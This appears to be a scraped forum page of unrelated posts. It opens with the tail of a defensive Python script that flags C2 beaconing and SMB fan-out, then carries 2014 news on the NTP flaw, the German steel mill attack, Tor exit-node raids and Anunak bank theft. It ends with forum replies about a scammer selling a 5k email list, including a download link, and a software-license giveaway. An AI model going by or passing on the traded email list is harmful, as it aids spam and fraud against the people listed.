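    ("2014-11-24 09:00:00", "10.0.5.17", "203.0.113.9", 443),
    ("2014-11-24 09:05:02", "10.0.5.17", "203.0.113.9", 443),
    ("2014-11-24 09:10:01", "10.0.5.17", "203.0.113.9", 443),
    ("2014-11-24 09:14:58", "10.0.5.17", "203.0.113.9", 443),
    ("2014-11-24 09:01:00", "10.0.5.17", "10.0.5.20", 445),
    ("2014-11-24 09:01:30", "10.0.5.17", "10.0.5.21", 445),
    ("2014-11-24 09:02:00", "10.0.5.17", "10.0.5.22", 445),
    ("2014-11-24 09:00:00", "10.0.5.30", "10.0.5.40", 445),  # ordinary share use
]

if __name__ == "__main__":
    print(find_beacons(FLOWS), find_smb_fanout(FLOWS))
```

Because the advisory says the beacon goes to one of a handful of servers, a host that rotates between C2 addresses would need the beacon check grouped by source only; the thresholds are starting points for tuning, not validated values.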
-
Critical holes have been reported in the implementation of the network time protocol (NTP) that could allow unsophisticated attackers root access on servers. System administrators may need to forgo the Christmas beers and roasted beasts until they've updated NTP daemons running versions 4.2.8 and below. The grinch bug was announced by the US Industrial Control Systems Emergency Response Team, which received news of the hole from Google security researchers. "Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process," the agency said in an advisory. "An attacker with a low skill would be able to exploit these vulnerabilities. Exploits that target these vulnerabilities are publicly available." Google's Neel Mehta and Stephen Roettger reported two serious and four "less-serious" bugs, which were patched in 4.2.8, released 18 December. These included weak default keys, weak random number generator seeds, and buffer overflows. Admins should back up operational industrial control system configurations and test the patch prior to deployment, the computer emergency response team urged. It's also advisable to harden systems by minimising network exposure, including by shoving remote devices and - where applicable - control system networks behind firewalls and into isolated zones. Source
-
A blast furnace at a German steel mill suffered "massive damage" following a cyber attack on the plant's network, says a report. Details of the incident emerged in the annual report of the German Federal Office for Information Security (BSI). It said attackers used booby-trapped emails to steal logins that gave them access to the mill's control systems. This led to parts of the plant failing and meant a blast furnace could not be shut down as normal. The unscheduled shutdown of the furnace caused the damage, said the report. In its report, BSI said the attackers were very skilled and used both targeted emails and social engineering techniques to infiltrate the plant. In particular, said BSI, the attackers used a "spear phishing" campaign aimed at particular individuals in the company to trick people into opening messages that sought and grabbed login names and passwords. The phishing helped the hackers extract information they used to gain access to the plant's office network and then its production systems. Once inside the steel mill's network, the "technical capabilities" of the attackers were evident, said the BSI report, as they showed familiarity not only with conventional IT security systems but also with the specialised software used to oversee and administer the plant. BSI did not name the company operating the plant, nor say when the attack took place. In addition, it said it did not know who was behind the attack nor what motivated it. The attack is one of only a few on industrial systems known to have caused damage. The most widely known example of such an attack involved the Stuxnet worm, which damaged centrifuges being used by Iran in its nuclear enrichment programme. Benjamin Sonntag, a software developer and digital rights activist, told Reuters: "We do not expect a nuclear power plant or steel plant to be connected to the internet. To be computerised, but to be connected to the internet and to be hackable - that is quite unexpected," he said. Source
-
As foreshadowed last week, Tor network exit nodes have gone down after what appear to be raids by law enforcement authorities. Thomas White (@CthulhuSec) warned users to steer clear of his Tor servers after he lost control of them following what he called "unusual activity". "I have now lost control of all servers under the ISP and my account has been suspended," White wrote in an update on the Tor mailing list. "Having reviewed the last available information of the sensors, the chassis of the servers was opened and an unknown USB device was plugged in only 30-60 seconds before the connection was broken. From experience I know this trend of activity is similar to the protocol of sophisticated law enforcement who carry out a search and seizure of running servers." White said users should treat the servers as hostile until control was regained, signified by a PGP-signed message from himself. He also urged them not to jump to conclusions about the identity of any possible agency nor harbour concern for the integrity of the Tor network. "If any of the mirrors or IPs do come back online, I would welcome anyone who is capable of doing so checking for any malicious code to ensure they are not used to deploy any kind of state malware or attacks against users should my theory prove to be the case," he added. Should no further updates be delivered, White said users were welcome to assume he was under a gag order. Exit nodes are the bridge between the Tor network and the public internet and funnel all forms of traffic regardless of the intent of the user. As a result they are of interest to cyber crime agencies, which have occasionally raided operators suspected of assisting the distribution of child exploitation material and other net menaces. The possible raids came less than a week after White served Globe and Atlas mirrors as Tor hidden services.
It also followed warnings Saturday by Tor Project leader Roger Dingledine that the network could be disrupted after a source warned of a possible raid against directory authorities, which help users find relays. Tor users should note and temporarily avoid the affected mirrors listed in the original post. Source
-
Two security firms have uncovered a hacker group that has been siphoning tens of millions of dollars from bank accounts. Group-IB and Fox-IT said that the Anunak hacker group is associated with cyber theft from banks in Russia, Ukraine, Belarus and Georgia, among other countries, and from retailers in the US and Europe. "Anunak is unique in the fact that it targets banks and e-payment systems," the security firms said in a joint report (PDF). "The goal is to get into bank networks and gain access to secured payment systems. As a result, the money is stolen not from the customers, but from the bank itself." The attacks gain access to target systems through spear phishing emails, and are thought to have netted around $17m so far, most of it in the past six months. It is believed that the malware has been installed in cash machines, and could be activated at any time, according to the report. The gang has also ventured into other areas, including compromising media groups and other organisations for the purposes of industrial espionage or to gain a trading advantage on the local stock market. "We have seen criminals branching out for years, for example with point-of-sale malware," said Andy Chandler, Fox-IT's senior vice president and general manager. "Anunak has capabilities which pose threats across multiple continents and industries. It shows there's a grey area between advanced persistent threats and botnets. "The criminals' pragmatic approach once more starts a new chapter in the cybercrime ecosystem." Source
-
Friend, is it hard for you to understand? So the guy has already scammed a few people with those 5k emails (old ones, from around 2009); he himself admitted to me in a PM that those are the ones in question. Don't comment if you don't know.
-
Man, it's not about the scanner, it's about those 5k emails. Believe me, I know who the kid is, and those 5k emails have been PUBLIC everywhere since 2009. Let's end the discussion here, there's no point.
-
Bro, stop coming here begging. Plus, the guy is offering a list of 5k emails that is public; he has already scammed someone else this way. That email scanner: https://mega.co.nz/#!YRYhkDKJ!DX0m37MCeweizFfQ3v2aswAKJc211SreiEUjZ7u1rNE this is the list he is selling.
-
@io.kent Happy holidays to you too, bro, we're going to miss you...
-
IObit Driver Booster 2 PRO lets you easily identify and update outdated drivers. It also has a built-in ability to back up/restore drivers and tweak drivers to provide the best gaming performance. Download: Free 1-Year License IObit Driver Booster 2 PRO (100% discount)